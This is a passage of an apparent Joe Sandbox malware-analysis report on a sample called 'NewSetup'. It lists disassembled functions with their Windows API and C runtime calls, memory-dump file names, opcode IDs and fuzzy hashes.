                                                                                                      • Opcode ID: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
                                                                                                      • Instruction ID: 6a9e1b5a4484faa21fb449248e11a8719031191cbb7d990c358602d5bb14f7f0
                                                                                                      • Opcode Fuzzy Hash: ce3a770960a617fb4fcd2bd548a07136e9d7013afc0d232adfb4ce46afc05ef6
                                                                                                      • Instruction Fuzzy Hash: 71E01AB07A0205BAEF201F61EC4EB6C3A59AB52B91F144420F94DA88E0DB71EC649945
                                                                                                      APIs
                                                                                                      • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00234001
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00234253
                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00234299
                                                                                                      • GetLastError.KERNEL32 ref: 0023433C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2112829910-0
                                                                                                      • Opcode ID: ee51059b929a84c719b07eb4b201340fe84c5556f77e3b61d221b5b0bf4f1785
                                                                                                      • Instruction ID: cf4cfc4086c25db6081b938e6d7dfa85e89ba01ebc346c445ed138fe4616d60c
                                                                                                      • Opcode Fuzzy Hash: ee51059b929a84c719b07eb4b201340fe84c5556f77e3b61d221b5b0bf4f1785
                                                                                                      • Instruction Fuzzy Hash: 51D198B5E102589FCF14DFE8D884AEDBBB4FF09314F2841AAE856EB351D630A951CB50
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AdjustPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1740715915-0
                                                                                                      • Opcode ID: fcf5381fba0fbea99365acfeb520a1903e64be7872e23b9eaa13e6ccc3fcc8c1
                                                                                                      • Instruction ID: 034b16a4f13fa947d55aff8dcd24da90a7d3d2e20afae49f63686827a2a3e9a8
                                                                                                      • Opcode Fuzzy Hash: fcf5381fba0fbea99365acfeb520a1903e64be7872e23b9eaa13e6ccc3fcc8c1
                                                                                                      • Instruction Fuzzy Hash: 4F51D471A24622FFDB26DFD0E891BAA73A4EF04710F14456DEC0657291D771ECA0CB90
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002172C5
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00217395
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002173A3
                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002173B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2261580123-0
                                                                                                      • Opcode ID: e6d8ea7b23a051676a03a05b8255f8748ca6dc14393462ec70bdfff5eafa1f8b
                                                                                                      • Instruction ID: 53f3afac642ca10e6f550c36a43b782421919c164c98c5a4c32175135559ee24
                                                                                                      • Opcode Fuzzy Hash: e6d8ea7b23a051676a03a05b8255f8748ca6dc14393462ec70bdfff5eafa1f8b
                                                                                                      • Instruction Fuzzy Hash: 4141F5B19143068BDB21DF24C845BEFB7F4BFA4320F144679D82647691EB34E8A5CB91
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00214495
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002144B2
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002144D3
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00214580
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID:
                                                                                                      • API String ID: 593203224-0
                                                                                                      • Opcode ID: 4c4577c80ff28a873996e4f01808e6e58d543981ea111ce3d0fbf0e81321b04a
                                                                                                      • Instruction ID: e6ab17f6e347e09cf7fdc4472a1e28c73b8c9433c6b3dd0c75654b8eab4e6da3
                                                                                                      • Opcode Fuzzy Hash: 4c4577c80ff28a873996e4f01808e6e58d543981ea111ce3d0fbf0e81321b04a
                                                                                                      • Instruction Fuzzy Hash: CF418875D112198FCB10EF98E848BEDBBF5FB69320F544229E80967391D734A990CFA1
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00231E2A
                                                                                                      • __dosmaperr.LIBCMT ref: 00231E31
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00231E6B
                                                                                                      • __dosmaperr.LIBCMT ref: 00231E72
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1913693674-0
                                                                                                      • Opcode ID: 0fb775894408ad03ef7fe822f3ebe66d5f682f02336f217724643bf770e3dff0
                                                                                                      • Instruction ID: 7da396cc7891a934dd7dd2fca6d96b71e0c405be5a711f71efc3f522c5382952
                                                                                                      • Opcode Fuzzy Hash: 0fb775894408ad03ef7fe822f3ebe66d5f682f02336f217724643bf770e3dff0
                                                                                                      • Instruction Fuzzy Hash: DC21B0B1624226BFDB20AFA5DC8596BB7A9FF05364F108519FC1997111D732EC308BA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 770a8837a108b879bc0b22d914b321b23d31bbb30dd47a2bd62ca2245769635e
                                                                                                      • Instruction ID: a88b84bcb89b3d6ac77efd8ecf4a730f2091b902b3f6a34e0560bcdb53c8b392
                                                                                                      • Opcode Fuzzy Hash: 770a8837a108b879bc0b22d914b321b23d31bbb30dd47a2bd62ca2245769635e
                                                                                                      • Instruction Fuzzy Hash: F021C231224236FF8B20AFE5FC8096AB7ACFF403647114516F855A7210EB32EC348BA0
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002331C6
                                                                                                        • Part of subcall function 0022C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0022D895,?,00000000,-00000008), ref: 0022C082
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002331FE
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023321E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 158306478-0
                                                                                                      • Opcode ID: 3c0e278ba531cdcd7deb84faa85c50a46b0177f406b54833118af2d1f30d357c
                                                                                                      • Instruction ID: 8ebc08137a9a41f3131f248e9e765ac421d26b996f6471121d3e4ebfa39738f5
                                                                                                      • Opcode Fuzzy Hash: 3c0e278ba531cdcd7deb84faa85c50a46b0177f406b54833118af2d1f30d357c
                                                                                                      • Instruction Fuzzy Hash: 0811C4F65316267EA7126BB5BC8ECBF6A5CDE86795B100015FE01D1100FFA4DF2085B2
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021E899
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021E8A3
                                                                                                      • int.LIBCPMT ref: 0021E8BA
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0021C1F6
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0021C210
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021E914
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                      • String ID:
                                                                                                      • API String ID: 1383202999-0
                                                                                                      • Opcode ID: ada35f406293fcb543c6a82799591b507e54fac0e5fc7f408bf9b3c0b3d5f09f
                                                                                                      • Instruction ID: c11387cb3629fc40d0de1bf19bab857dd9cb23d7c0e913788dbd39b0da79b095
                                                                                                      • Opcode Fuzzy Hash: ada35f406293fcb543c6a82799591b507e54fac0e5fc7f408bf9b3c0b3d5f09f
                                                                                                      • Instruction Fuzzy Hash: 891102759251159BCF05EF64C9056FDBBF1AFA4720F350008E8116B292CF749AA0CF81
                                                                                                      APIs
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000), ref: 0023ADB7
                                                                                                      • GetLastError.KERNEL32(?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?,?,?,00233CD6,00000000), ref: 0023ADC3
                                                                                                        • Part of subcall function 0023AE20: CloseHandle.KERNEL32(FFFFFFFE,0023ADD3,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?,?), ref: 0023AE30
                                                                                                      • ___initconout.LIBCMT ref: 0023ADD3
                                                                                                        • Part of subcall function 0023ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0023AD91,0023A2DC,?,?,00234390,?,00000000,00000000,?), ref: 0023AE08
                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0023A2EF,00000000,00000001,00000000,?,?,00234390,?,00000000,00000000,?), ref: 0023ADE8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                      • String ID:
                                                                                                      • API String ID: 2744216297-0
                                                                                                      • Opcode ID: 623dc61cc681e19b9e34b1fd302f50be916f7a1de0cbcc683530875fd19ca169
                                                                                                      • Instruction ID: 157d96b3f2fbdec397b18e64c51d73b833da8490f18b74337e6051ad5768cce3
                                                                                                      • Opcode Fuzzy Hash: 623dc61cc681e19b9e34b1fd302f50be916f7a1de0cbcc683530875fd19ca169
                                                                                                      • Instruction Fuzzy Hash: 5AF0127A510119BBCF622FD5FC0C99A3F26FF46761F004021FD4885120D7728C609B92
                                                                                                      APIs
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00220507
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00220516
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0022051F
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0022052C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0022B893,?,?,00000000,00000000,00000000,?), ref: 0022B9B7
Strings
Memory Dump Source
• Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 0022B475
Strings
Memory Dump Source
• Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
Similarity
• API ID: ___except_validate_context_record
• String ID: csm$csm
• API String ID: 3493665558-3733052814
APIs
• __alloca_probe_16.LIBCMT ref: 0021B8B9
• RaiseException.KERNEL32(?,?,?,?,?), ref: 0021B8DE
  • Part of subcall function 0022060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0021F354,00000000,?,?,?,0021F354,00213D4A,0024759C,00213D4A), ref: 0022066D
  • Part of subcall function 00228353: IsProcessorFeaturePresent.KERNEL32(00000017,0022378B,?,?,?,?,00000000,?,?,?,0021B5AC,0021B4E0,00000000,?,?,0021B4E0), ref: 0022836F
Strings
Memory Dump Source
• Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
Similarity
• API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
• String ID: csm
• API String ID: 1924019822-1018135373
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 00212673
Strings
Memory Dump Source
• Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
Similarity
• API ID: ___std_exception_copy
• String ID: bad array new length$ios_base::badbit set
• API String ID: 2659868963-1158432155
APIs
  • Part of subcall function 0022060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0021F354,00000000,?,?,?,0021F354,00213D4A,0024759C,00213D4A), ref: 0022066D
• ___std_exception_copy.LIBVCRUNTIME ref: 00212673
Strings
Memory Dump Source
• Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
Similarity
• API ID: ExceptionRaise___std_exception_copy
• String ID: bad array new length$ios_base::badbit set
• API String ID: 3109751735-1158432155